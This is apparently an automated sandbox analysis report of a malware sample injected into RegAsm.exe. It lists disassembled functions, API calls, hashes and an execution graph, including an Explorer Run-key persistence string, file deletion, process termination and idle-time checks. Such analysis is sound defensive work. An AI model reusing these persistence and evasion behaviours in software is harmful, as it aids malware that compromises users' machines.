                                                • Source File: 00000011.00000002.623722246.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000011.00000002.623722246.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                • Associated: 00000011.00000002.623722246.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_17_2_400000_RegAsm.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: Init_thread_footer__onexit
                                                • String ID: ,kG$0kG
                                                • API String ID: 1881088180-2015055088
                                                • Opcode ID: 6e3451c1f808ccc17589ee43c3bbf287c043e9bd68a58e8b3248af8f7871f884
                                                • Instruction ID: 52a075922dd803dc3791164d579436726ad124eb3de8ddc986de269a183bf650
                                                • Opcode Fuzzy Hash: 6e3451c1f808ccc17589ee43c3bbf287c043e9bd68a58e8b3248af8f7871f884
                                                • Instruction Fuzzy Hash: A8E0D8315149208EC514B729E542AC53395DB0E324B21907BF014D72D2CBAE78C28E5D
                                                Function 00413A5E Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 23registryCOMMON
                                                Download Yara Rule
                                                APIs
                                                Strings
                                                • Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\, xrefs: 00413A6A
                                                Memory Dump Source
                                                • Source File: 00000011.00000002.623722246.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000011.00000002.623722246.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                • Associated: 00000011.00000002.623722246.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_17_2_400000_RegAsm.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: DeleteOpenValue
                                                • String ID: Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\
                                                • API String ID: 2654517830-1051519024
                                                • Opcode ID: 37389d7ee51bec1c2129a7b253fd7a72f11d6a1cc032b6ab4e225ceb9c6d243b
                                                • Instruction ID: 8a242acd51d06e7ce72e997358fe7bb9804e2c240f13b939b69747d851efcbee
                                                • Opcode Fuzzy Hash: 37389d7ee51bec1c2129a7b253fd7a72f11d6a1cc032b6ab4e225ceb9c6d243b
                                                • Instruction Fuzzy Hash: FFE0C231244208FBEF104FB1DD06FFA7B2CDB01F42F1006A9BA0692192C626CE049664
                                                Function 0040B8A4 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 22fileCOMMON
                                                Download Yara Rule
                                                APIs
                                                • DeleteFileW.KERNEL32(00000000,?,pth_unenc), ref: 0040B8B1
                                                • RemoveDirectoryW.KERNEL32(00000000,?,pth_unenc), ref: 0040B8DC
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000011.00000002.623722246.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000011.00000002.623722246.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                • Associated: 00000011.00000002.623722246.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_17_2_400000_RegAsm.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: DeleteDirectoryFileRemove
                                                • String ID: pth_unenc
                                                • API String ID: 3325800564-4028850238
                                                • Opcode ID: abbea0d7173f6b15884b0e8937d7cb34f61697f5a4d448918d1cd9e56a781f81
                                                • Instruction ID: ee660421d7ec44f6c6eaad5e9e1fc6482a22fb53094cf60c5c3e5a772ac54322
                                                • Opcode Fuzzy Hash: abbea0d7173f6b15884b0e8937d7cb34f61697f5a4d448918d1cd9e56a781f81
                                                • Instruction Fuzzy Hash: 5AE04F314006109BC610BB218854AD6335CAB04316F00497BE4A3A35A1DF38AC49D658
                                                Function 0041288B Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 13synchronizationCOMMON
                                                Download Yara Rule
                                                APIs
                                                • TerminateProcess.KERNEL32(00000000,pth_unenc,0040F903), ref: 0041289B
                                                • WaitForSingleObject.KERNEL32(000000FF), ref: 004128AE
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000011.00000002.623722246.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000011.00000002.623722246.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                • Associated: 00000011.00000002.623722246.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_17_2_400000_RegAsm.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: ObjectProcessSingleTerminateWait
                                                • String ID: pth_unenc
                                                • API String ID: 1872346434-4028850238
                                                • Opcode ID: a2eb2d9afd673111ff5afcc9fde18e5bb16fff8f446b795bb15600cc5347fa32
                                                • Instruction ID: 30425768eaae71e8f6d4d073063fb5581f05561c6d480f36d281b696a9d2b878
                                                • Opcode Fuzzy Hash: a2eb2d9afd673111ff5afcc9fde18e5bb16fff8f446b795bb15600cc5347fa32
                                                • Instruction Fuzzy Hash: DBD01234149312FFD7310F60EE4DB443B589705362F140361F439552F1C7A589D4AB58
                                                Function 0041BB77 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 13COMMON
                                                Download Yara Rule
                                                APIs
                                                • GetLastInputInfo.USER32(NG), ref: 0041BB87
                                                • GetTickCount.KERNEL32(?,?,?,00415BDE), ref: 0041BB8D
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000011.00000002.623722246.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000011.00000002.623722246.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                • Associated: 00000011.00000002.623722246.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_17_2_400000_RegAsm.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: CountInfoInputLastTick
                                                • String ID: NG
                                                • API String ID: 3478931382-1651712548
                                                • Opcode ID: 1072e3c2261f103fc32e137a75d3669dd2f4511b29ca1c5cc6daf9e0edaf2e7e
                                                • Instruction ID: 91b37e9d9b7f8f393223e5bf0be67cbbeb1ccf95644ad96dbec1e326022f3834
                                                • Opcode Fuzzy Hash: 1072e3c2261f103fc32e137a75d3669dd2f4511b29ca1c5cc6daf9e0edaf2e7e
                                                • Instruction Fuzzy Hash: 84D0C97180060CABDB04AFA5EC4D99DBBBCEB05212F1042A5E84992210DA71AA548A95
                                                Function 00440CE1 Relevance: 5.1, APIs: 4, Instructions: 139COMMONLIBRARYCODE
                                                Download Yara Rule
                                                APIs
                                                • MultiByteToWideChar.KERNEL32(?,00000009,?,00000000,00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,?,?,00000000,00401D55), ref: 00440D77
                                                • GetLastError.KERNEL32 ref: 00440D85
                                                • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 00440DE0
                                                Memory Dump Source
                                                • Source File: 00000011.00000002.623722246.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000011.00000002.623722246.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                • Associated: 00000011.00000002.623722246.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_17_2_400000_RegAsm.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: ByteCharMultiWide$ErrorLast
                                                • String ID:
                                                • API String ID: 1717984340-0
                                                • Opcode ID: b039ec4469df985fcedc89be96e173b9c6b75658958c27081834ba59c0289411
                                                • Instruction ID: 51be13377619d21db21fabe69686c0ed70cae26876ac5a8e773c252addda8789
                                                • Opcode Fuzzy Hash: b039ec4469df985fcedc89be96e173b9c6b75658958c27081834ba59c0289411
                                                • Instruction Fuzzy Hash: 2D412670A00212AFEF218FA5C8447BBBBA4EF41310F2045AAFA59573E1DB399C31C759
                                                Function 00411B9A Relevance: 5.1, APIs: 4, Instructions: 119COMMON
                                                Download Yara Rule
                                                APIs
                                                • IsBadReadPtr.KERNEL32(?,00000014), ref: 00411BC7
                                                • IsBadReadPtr.KERNEL32(?,00000014), ref: 00411C93
                                                • SetLastError.KERNEL32(0000007F,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00411CB5
                                                • SetLastError.KERNEL32(0000007E,00411F2B), ref: 00411CCC
                                                Memory Dump Source
                                                • Source File: 00000011.00000002.623722246.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000011.00000002.623722246.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                • Associated: 00000011.00000002.623722246.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_17_2_400000_RegAsm.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: ErrorLastRead
                                                • String ID:
                                                • API String ID: 4100373531-0
                                                • Opcode ID: 90639ee29dfdd48ecb3f8d3d3319bc7730bab7022ac74643829df8c5f46e8e60
                                                • Instruction ID: 65e884089caabfe283b2879acbb60db065d5dd9ad58be7743d127bf22715a70c
                                                • Opcode Fuzzy Hash: 90639ee29dfdd48ecb3f8d3d3319bc7730bab7022ac74643829df8c5f46e8e60
                                                • Instruction Fuzzy Hash: 60419D716443059FEB248F19DC84BA7B3E4FF44714F00082EEA4A876A1F738E845CB99

                                                Execution Graph

                                                Execution Coverage:5.4%
                                                Dynamic/Decrypted Code Coverage:9.2%
                                                Signature Coverage:0%
                                                Total number of Nodes:1990
                                                Total number of Limit Nodes:56
                                                execution_graph 37716 4466f4 37735 446904 37716->37735 37718 446700 GetModuleHandleA 37721 446710 __set_app_type __p__fmode __p__commode 37718->37721 37720 4467a4 37722 4467ac __setusermatherr 37720->37722 37723 4467b8 37720->37723 37721->37720 37722->37723 37736 4468f0 _controlfp 37723->37736 37725 4467bd _initterm GetEnvironmentStringsW _initterm 37726 44681e GetStartupInfoW 37725->37726 37727 446810 37725->37727 37729 446866 GetModuleHandleA 37726->37729 37737 41276d 37729->37737 37733 446896 exit 37734 44689d _cexit 37733->37734 37734->37727 37735->37718 37736->37725 37738 41277d 37737->37738 37780 4044a4 LoadLibraryW 37738->37780 37740 412785 37741 412789 37740->37741 37786 414b81 37740->37786 37741->37733 37741->37734 37744 4127c8 37790 412465 memset ??2@YAPAXI 37744->37790 37746 4127ea 37802 40ac21 37746->37802 37751 412813 37820 40dd07 memset 37751->37820 37752 412827 37825 40db69 memset 37752->37825 37755 412822 37847 4125b6 ??3@YAXPAX DeleteObject 37755->37847 37757 40ada2 _wcsicmp 37758 41283d 37757->37758 37758->37755 37761 412863 CoInitialize 37758->37761 37830 41268e 37758->37830 37760 412966 37848 40b1ab free free 37760->37848 37846 4123e2 GetModuleHandleW RegisterClassW GetModuleHandleW CreateWindowExW 37761->37846 37765 41296f 37849 40b633 37765->37849 37767 412873 ShowWindow UpdateWindow GetModuleHandleW LoadAcceleratorsW GetMessageW 37772 412957 CoUninitialize 37767->37772 37777 4128ca 37767->37777 37772->37755 37773 4128d0 TranslateAcceleratorW 37774 412941 GetMessageW 37773->37774 37773->37777 37774->37772 37774->37773 37775 412909 IsDialogMessageW 37775->37774 37775->37777 37776 4128fd IsDialogMessageW 37776->37774 37776->37775 37777->37773 37777->37775 37777->37776 37778 41292b TranslateMessage DispatchMessageW 37777->37778 37779 41291f IsDialogMessageW 37777->37779 37778->37774 37779->37774 37779->37778 37781 4044f3 37780->37781 37785 4044cf FreeLibrary 37780->37785 37783 404507 MessageBoxW 37781->37783 37784 40451e 37781->37784 37783->37740 37784->37740 37785->37781 37787 414b8a 37786->37787 37788 412794 SetErrorMode GetModuleHandleW EnumResourceTypesW 37786->37788 37853 40a804 memset 37787->37853 37788->37744 37791 4124e0 37790->37791 37792 412505 ??2@YAPAXI 37791->37792 37793 41251c 37792->37793 37798 412521 37792->37798 37875 40e820 memset ??2@YAPAXI ??2@YAPAXI ??2@YAPAXI ??2@YAPAXI 37793->37875 37864 444722 37798->37864 37801 41259b wcscpy 37801->37746 37880 40b1ab free free 37802->37880 37806 40ad4b 37815 40ad76 37806->37815 37904 40a9ce 37806->37904 37807 40a9ce malloc memcpy free free 37808 40ac5c 37807->37808 37808->37806 37808->37807 37810 40ace7 free 37808->37810 37808->37815 37884 40a8d0 37808->37884 37896 4099f4 37808->37896 37810->37808 37814 40a8d0 7 API calls 37814->37815 37881 40aa04 37815->37881 37816 40ada2 37817 40adaa 37816->37817 37818 40adc9 37816->37818 37817->37818 37819 40adb3 _wcsicmp 37817->37819 37818->37751 37818->37752 37819->37817 37819->37818 37909 40dce0 37820->37909 37822 40dd3a GetModuleHandleW 37914 40dba7 37822->37914 37826 40dce0 3 API calls 37825->37826 37827 40db99 37826->37827 37986 40dae1 37827->37986 38000 402f3a 37830->38000 37832 412766 37832->37755 37832->37761 37833 4126d3 _wcsicmp 37834 4126a8 37833->37834 37834->37832 37834->37833 37836 41270a 37834->37836 38034 4125f8 7 API calls 37834->38034 37836->37832 38003 411ac5 37836->38003 37846->37767 37847->37760 37848->37765 37850 40b640 37849->37850 37851 40b639 free 37849->37851 37852 40b1ab free free 37850->37852 37851->37850 37852->37741 37854 40a83b GetSystemDirectoryW 37853->37854 37855 40a84c wcscpy 37853->37855 37854->37855 37860 409719 wcslen 37855->37860 37858 40a881 LoadLibraryW 37859 40a886 37858->37859 37859->37788 37861 409724 37860->37861 37862 409739 wcscat LoadLibraryW 37860->37862 37861->37862 37863 40972c wcscat 37861->37863 37862->37858 37862->37859 37863->37862 37865 444732 37864->37865 37866 444728 DeleteObject 37864->37866 37876 409cc3 37865->37876 37866->37865 37868 412551 37869 4010f9 37868->37869 37870 401130 37869->37870 37871 401134 GetModuleHandleW LoadIconW 37870->37871 37872 401107 wcsncat 37870->37872 37873 40a7be 37871->37873 37872->37870 37874 40a7d2 37873->37874 37874->37801 37874->37874 37875->37798 37879 409bfd memset wcscpy 37876->37879 37878 409cdb CreateFontIndirectW 37878->37868 37879->37878 37880->37808 37882 40aa14 37881->37882 37883 40aa0a free 37881->37883 37882->37816 37883->37882 37885 40a8eb 37884->37885 37886 40a8df wcslen 37884->37886 37887 40a906 free 37885->37887 37888 40a90f 37885->37888 37886->37885 37892 40a919 37887->37892 37889 4099f4 3 API calls 37888->37889 37889->37892 37890 40a932 37894 4099f4 3 API calls 37890->37894 37891 40a929 free 37893 40a93e memcpy 37891->37893 37892->37890 37892->37891 37893->37808 37895 40a93d 37894->37895 37895->37893 37897 409a41 37896->37897 37898 4099fb malloc 37896->37898 37897->37808 37900 409a37 37898->37900 37901 409a1c 37898->37901 37900->37808 37902 409a30 free 37901->37902 37903 409a20 memcpy 37901->37903 37902->37900 37903->37902 37905 40a9e7 37904->37905 37906 40a9dc free 37904->37906 37908 4099f4 3 API calls 37905->37908 37907 40a9f2 37906->37907 37907->37814 37908->37907 37933 409bca GetModuleFileNameW 37909->37933 37911 40dce6 wcsrchr 37912 40dcf5 37911->37912 37913 40dcf9 wcscat 37911->37913 37912->37913 37913->37822 37934 44db70 37914->37934 37918 40dbfd 37937 4447d9 37918->37937 37921 40dc34 wcscpy wcscpy 37963 40d6f5 37921->37963 37922 40dc1f wcscpy 37922->37921 37925 40d6f5 3 API calls 37926 40dc73 37925->37926 37927 40d6f5 3 API calls 37926->37927 37928 40dc89 37927->37928 37929 40d6f5 3 API calls 37928->37929 37930 40dc9c EnumResourceNamesW EnumResourceNamesW wcscpy 37929->37930 37969 40da80 37930->37969 37933->37911 37935 40dbb4 memset memset 37934->37935 37936 409bca GetModuleFileNameW 37935->37936 37936->37918 37939 4447f4 37937->37939 37938 40dc1b 37938->37921 37938->37922 37939->37938 37940 444807 ??2@YAPAXI 37939->37940 37941 44481f 37940->37941 37942 444873 _snwprintf 37941->37942 37943 4448ab wcscpy 37941->37943 37976 44474a 8 API calls 37942->37976 37945 4448bb 37943->37945 37977 44474a 8 API calls 37945->37977 37946 4448a7 37946->37943 37946->37945 37948 4448cd 37978 44474a 8 API calls 37948->37978 37950 4448e2 37979 44474a 8 API calls 37950->37979 37952 4448f7 37980 44474a 8 API calls 37952->37980 37954 44490c 37981 44474a 8 API calls 37954->37981 37956 444921 37982 44474a 8 API calls 37956->37982 37958 444936 37983 44474a 8 API calls 37958->37983 37960 44494b 37984 44474a 8 API calls 37960->37984 37962 444960 ??3@YAXPAX 37962->37938 37964 44db70 37963->37964 37965 40d702 memset GetPrivateProfileStringW 37964->37965 37966 40d752 37965->37966 37967 40d75c WritePrivateProfileStringW 37965->37967 37966->37967 37968 40d758 37966->37968 37967->37968 37968->37925 37970 44db70 37969->37970 37971 40da8d memset 37970->37971 37972 40daac LoadStringW 37971->37972 37973 40dac6 37972->37973 37973->37972 37975 40dade 37973->37975 37985 40d76e memset GetPrivateProfileStringW WritePrivateProfileStringW memset _itow 37973->37985 37975->37755 37976->37946 37977->37948 37978->37950 37979->37952 37980->37954 37981->37956 37982->37958 37983->37960 37984->37962 37985->37973 37996 409b98 GetFileAttributesW 37986->37996 37988 40daea 37989 40db63 37988->37989 37990 40daef wcscpy wcscpy GetPrivateProfileIntW 37988->37990 37989->37757 37997 40d65d GetPrivateProfileStringW 37990->37997 37992 40db3e 37998 40d65d GetPrivateProfileStringW 37992->37998 37994 40db4f 37999 40d65d GetPrivateProfileStringW 37994->37999 37996->37988 37997->37992 37998->37994 37999->37989 38035 40eaff 38000->38035 38004 411ae2 memset 38003->38004 38005 411b8f 38003->38005 38076 409bca GetModuleFileNameW 38004->38076 38017 411a8b 38005->38017 38007 411b0a wcsrchr 38008 411b22 wcscat 38007->38008 38009 411b1f 38007->38009 38077 414770 wcscpy wcscpy wcscpy CloseHandle 38008->38077 38009->38008 38011 411b67 38078 402afb 38011->38078 38015 411b7f 38134 40ea13 SendMessageW memset SendMessageW 38015->38134 38018 402afb 27 API calls 38017->38018 38019 411ac0 38018->38019 38020 4110dc 38019->38020 38021 41113e 38020->38021 38026 4110f0 38020->38026 38159 40969c LoadCursorW SetCursor 38021->38159 38023 411143 38160 4032b4 38023->38160 38178 444a54 38023->38178 38024 4110f7 _wcsicmp 38024->38026 38025 411157 38027 40ada2 _wcsicmp 38025->38027 38026->38021 38026->38024 38181 410c46 10 API calls 38026->38181 38030 411167 38027->38030 38028 4111af 38030->38028 38031 4111a6 qsort 38030->38031 38031->38028 38034->37834 38036 40eb10 38035->38036 38049 40e8e0 38036->38049 38039 40eb6c memcpy memcpy 38040 40ebe1 38039->38040 38041 40ebb7 38039->38041 38040->38039 38042 40ebf2 ??2@YAPAXI ??2@YAPAXI 38040->38042 38041->38040 38043 40d134 16 API calls 38041->38043 38044 40ec2e ??2@YAPAXI 38042->38044 38047 40ec65 38042->38047 38043->38041 38044->38047 38059 40ea7f 38047->38059 38048 402f49 38048->37834 38050 40e8f2 38049->38050 38051 40e8eb ??3@YAXPAX 38049->38051 38052 40e900 38050->38052 38053 40e8f9 ??3@YAXPAX 38050->38053 38051->38050 38054 40e911 38052->38054 38055 40e90a ??3@YAXPAX 38052->38055 38053->38052 38056 40e931 ??2@YAPAXI ??2@YAPAXI 38054->38056 38057 40e921 ??3@YAXPAX 38054->38057 38058 40e92a ??3@YAXPAX 38054->38058 38055->38054 38056->38039 38057->38058 38058->38056 38060 40aa04 free 38059->38060 38061 40ea88 38060->38061 38062 40aa04 free 38061->38062 38063 40ea90 38062->38063 38064 40aa04 free 38063->38064 38065 40ea98 38064->38065 38066 40aa04 free 38065->38066 38067 40eaa0 38066->38067 38068 40a9ce 4 API calls 38067->38068 38069 40eab3 38068->38069 38070 40a9ce 4 API calls 38069->38070 38071 40eabd 38070->38071 38072 40a9ce 4 API calls 38071->38072 38073 40eac7 38072->38073 38074 40a9ce 4 API calls 38073->38074 38075 40ead1 38074->38075 38075->38048 38076->38007 38077->38011 38135 40b2cc 38078->38135 38080 402b0a 38081 40b2cc 27 API calls 38080->38081 38082 402b23 38081->38082 38083 40b2cc 27 API calls 38082->38083 38084 402b3a 38083->38084 38085 40b2cc 27 API calls 38084->38085 38086 402b54 38085->38086 38087 40b2cc 27 API calls 38086->38087 38088 402b6b 38087->38088 38089 40b2cc 27 API calls 38088->38089 38090 402b82 38089->38090 38091 40b2cc 27 API calls 38090->38091 38092 402b99 38091->38092 38093 40b2cc 27 API calls 38092->38093 38094 402bb0 38093->38094 38095 40b2cc 27 API calls 38094->38095 38096 402bc7 38095->38096 38097 40b2cc 27 API calls 38096->38097 38098 402bde 38097->38098 38099 40b2cc 27 API calls 38098->38099 38100 402bf5 38099->38100 38101 40b2cc 27 API calls 38100->38101 38102 402c0c 38101->38102 38103 40b2cc 27 API calls 38102->38103 38104 402c23 38103->38104 38105 40b2cc 27 API calls 38104->38105 38106 402c3a 38105->38106 38107 40b2cc 27 API calls 38106->38107 38108 402c51 38107->38108 38109 40b2cc 27 API calls 38108->38109 38110 402c68 38109->38110 38111 40b2cc 27 API calls 38110->38111 38112 402c7f 38111->38112 38113 40b2cc 27 API calls 38112->38113 38114 402c99 38113->38114 38115 40b2cc 27 API calls 38114->38115 38116 402cb3 38115->38116 38117 40b2cc 27 API calls 38116->38117 38118 402cd5 38117->38118 38119 40b2cc 27 API calls 38118->38119 38120 402cf0 38119->38120 38121 40b2cc 27 API calls 38120->38121 38122 402d0b 38121->38122 38123 40b2cc 27 API calls 38122->38123 38124 402d26 38123->38124 38125 40b2cc 27 API calls 38124->38125 38126 402d3e 38125->38126 38127 40b2cc 27 API calls 38126->38127 38128 402d59 38127->38128 38129 40b2cc 27 API calls 38128->38129 38130 402d78 38129->38130 38131 40b2cc 27 API calls 38130->38131 38132 402d93 38131->38132 38133 4018db GetWindowPlacement memset GetSystemMetrics GetSystemMetrics SetWindowPlacement 38132->38133 38133->38015 38134->38005 38138 40b58d 38135->38138 38137 40b2d1 38137->38080 38139 40b5a4 GetModuleHandleW FindResourceW 38138->38139 38140 40b62e 38138->38140 38141 40b5c2 LoadResource 38139->38141 38143 40b5e7 38139->38143 38140->38137 38142 40b5d0 SizeofResource LockResource 38141->38142 38141->38143 38142->38143 38143->38140 38151 40afcf 38143->38151 38145 40b608 memcpy 38154 40b4d3 memcpy 38145->38154 38147 40b61e 38155 40b3c1 18 API calls 38147->38155 38149 40b626 38156 40b04b 38149->38156 38152 40b04b ??3@YAXPAX 38151->38152 38153 40afd7 ??2@YAPAXI 38152->38153 38153->38145 38154->38147 38155->38149 38157 40b051 ??3@YAXPAX 38156->38157 38158 40b05f 38156->38158 38157->38158 38158->38140 38159->38023 38161 4032c4 38160->38161 38162 40b633 free 38161->38162 38163 403316 38162->38163 38182 44553b 38163->38182 38167 403480 38380 40368c 15 API calls 38167->38380 38169 403489 38170 40b633 free 38169->38170 38172 403495 38170->38172 38171 40333c 38171->38167 38173 4033a9 memset memcpy 38171->38173 38174 4033ec wcscmp 38171->38174 38378 4028e7 11 API calls 38171->38378 38379 40f508 6 API calls 38171->38379 38172->38025 38173->38171 38173->38174 38174->38171 38176 403421 _wcsicmp 38176->38171 38179 444a64 FreeLibrary 38178->38179 38180 444a83 38178->38180 38179->38180 38180->38025 38181->38026 38183 445548 38182->38183 38184 445599 38183->38184 38381 40c768 38183->38381 38185 4455a8 memset 38184->38185 38327 4457f2 38184->38327 38465 403988 38185->38465 38191 4455e5 38200 445672 38191->38200 38210 44560f 38191->38210 38193 4458bb memset memset 38197 414c2e 16 API calls 38193->38197 38195 4459ed 38201 445a00 memset memset 38195->38201 38202 445b22 38195->38202 38196 44595e memset memset 38203 414c2e 16 API calls 38196->38203 38204 4458f9 38197->38204 38198 44557a 38205 44558c 38198->38205 38445 4136c0 38198->38445 38476 403fbe memset memset memset memset memset 38200->38476 38207 414c2e 16 API calls 38201->38207 38212 445bca 38202->38212 38213 445b38 memset memset memset 38202->38213 38208 44599c 38203->38208 38209 40b2cc 27 API calls 38204->38209 38449 444b06 38205->38449 38217 445a3e 38207->38217 38219 40b2cc 27 API calls 38208->38219 38220 445909 38209->38220 38222 4087b3 335 API calls 38210->38222 38221 445c8b memset memset 38212->38221 38278 445cf0 38212->38278 38225 445bd4 38213->38225 38226 445b98 38213->38226 38214 445849 38659 40b1ab free free 38214->38659 38227 40b2cc 27 API calls 38217->38227 38235 4459ac 38219->38235 38231 409d1f 6 API calls 38220->38231 38236 414c2e 16 API calls 38221->38236 38232 445621 38222->38232 38224 44589f 38660 40b1ab free free 38224->38660 38614 414c2e 38225->38614 38226->38225 38238 445ba2 38226->38238 38240 445a4f 38227->38240 38230 403335 38377 4452e5 43 API calls 38230->38377 38246 445919 38231->38246 38645 4454bf 20 API calls 38232->38645 38233 445823 38233->38214 38255 4087b3 335 API calls 38233->38255 38234 445854 38241 4458aa 38234->38241 38591 403c9c memset memset memset memset memset 38234->38591 38247 409d1f 6 API calls 38235->38247 38248 445cc9 38236->38248 38750 4099c6 wcslen 38238->38750 38239 4456b2 38647 40b1ab free free 38239->38647 38252 409d1f 6 API calls 38240->38252 38241->38193 38274 44594a 38241->38274 38244 445d3d 38273 40b2cc 27 API calls 38244->38273 38245 445d88 memset memset memset 38256 414c2e 16 API calls 38245->38256 38661 409b98 GetFileAttributesW 38246->38661 38257 4459bc 38247->38257 38258 409d1f 6 API calls 38248->38258 38249 445879 38249->38224 38268 4087b3 335 API calls 38249->38268 38251 445680 38251->38239 38499 4087b3 memset 38251->38499 38261 445a63 38252->38261 38253 40b2cc 27 API calls 38262 445bf3 38253->38262 38255->38233 38265 445dde 38256->38265 38726 409b98 GetFileAttributesW 38257->38726 38267 445ce1 38258->38267 38259 445bb3 38753 445403 memset 38259->38753 38271 40b2cc 27 API calls 38261->38271 38630 409d1f wcslen wcslen 38262->38630 38263 445928 38263->38274 38662 40b6ef 38263->38662 38275 40b2cc 27 API calls 38265->38275 38770 409b98 GetFileAttributesW 38267->38770 38268->38249 38280 445a94 38271->38280 38283 445d54 _wcsicmp 38273->38283 38274->38195 38274->38196 38286 445def 38275->38286 38276 4459cb 38276->38195 38293 40b6ef 249 API calls 38276->38293 38278->38230 38278->38244 38278->38245 38279 445389 255 API calls 38279->38212 38727 40ae18 38280->38727 38281 44566d 38281->38327 38550 413d4c 38281->38550 38290 445d71 38283->38290 38354 445d67 38283->38354 38285 445665 38646 40b1ab free free 38285->38646 38291 409d1f 6 API calls 38286->38291 38771 445093 23 API calls 38290->38771 38298 445e03 38291->38298 38293->38195 38294 4456d8 38300 40b2cc 27 API calls 38294->38300 38297 44563c 38297->38285 38303 4087b3 335 API calls 38297->38303 38772 409b98 GetFileAttributesW 38298->38772 38299 40b6ef 249 API calls 38299->38230 38305 4456e2 38300->38305 38301 40b2cc 27 API calls 38306 445c23 38301->38306 38302 445d83 38302->38230 38303->38297 38648 413fa6 _wcsicmp _wcsicmp 38305->38648 38310 409d1f 6 API calls 38306->38310 38308 445e12 38314 445e6b 38308->38314 38321 40b2cc 27 API calls 38308->38321 38312 445c37 38310->38312 38311 4456eb 38317 4456fd memset memset memset memset 38311->38317 38318 4457ea 38311->38318 38319 445389 255 API calls 38312->38319 38313 445b17 38747 40aebe 38313->38747 38774 445093 23 API calls 38314->38774 38649 409c70 wcscpy wcsrchr 38317->38649 38652 413d29 38318->38652 38325 445c47 38319->38325 38326 445e33 38321->38326 38323 445e7e 38328 445f67 38323->38328 38331 40b2cc 27 API calls 38325->38331 38332 409d1f 6 API calls 38326->38332 38327->38234 38568 403e2d memset memset memset memset memset 38327->38568 38334 40b2cc 27 API calls 38328->38334 38329 445ab2 memset 38335 40b2cc 27 API calls 38329->38335 38337 445c53 38331->38337 38333 445e47 38332->38333 38773 409b98 GetFileAttributesW 38333->38773 38339 445f73 38334->38339 38340 445aa1 38335->38340 38336 409c70 2 API calls 38341 44577e 38336->38341 38342 409d1f 6 API calls 38337->38342 38344 409d1f 6 API calls 38339->38344 38340->38313 38340->38329 38345 409d1f 6 API calls 38340->38345 38353 445389 255 API calls 38340->38353 38734 40add4 38340->38734 38739 40ae51 38340->38739 38346 409c70 2 API calls 38341->38346 38347 445c67 38342->38347 38343 445e56 38343->38314 38351 445e83 memset 38343->38351 38348 445f87 38344->38348 38345->38340 38349 44578d 38346->38349 38350 445389 255 API calls 38347->38350 38777 409b98 GetFileAttributesW 38348->38777 38349->38318 38356 40b2cc 27 API calls 38349->38356 38350->38212 38355 40b2cc 27 API calls 38351->38355 38353->38340 38354->38230 38354->38299 38357 445eab 38355->38357 38358 4457a8 38356->38358 38359 409d1f 6 API calls 38357->38359 38360 409d1f 6 API calls 38358->38360 38361 445ebf 38359->38361 38362 4457b8 38360->38362 38363 40ae18 9 API calls 38361->38363 38651 409b98 GetFileAttributesW 38362->38651 38373 445ef5 38363->38373 38365 4457c7 38365->38318 38367 4087b3 335 API calls 38365->38367 38366 40ae51 9 API calls 38366->38373 38367->38318 38368 445f5c 38370 40aebe FindClose 38368->38370 38369 40add4 2 API calls 38369->38373 38370->38328 38371 40b2cc 27 API calls 38371->38373 38372 409d1f 6 API calls 38372->38373 38373->38366 38373->38368 38373->38369 38373->38371 38373->38372 38375 445f3a 38373->38375 38775 409b98 GetFileAttributesW 38373->38775 38776 445093 23 API calls 38375->38776 38377->38171 38378->38176 38379->38171 38380->38169 38382 40c775 38381->38382 38778 40b1ab free free 38382->38778 38384 40c788 38779 40b1ab free free 38384->38779 38386 40c790 38780 40b1ab free free 38386->38780 38388 40c798 38389 40aa04 free 38388->38389 38390 40c7a0 38389->38390 38781 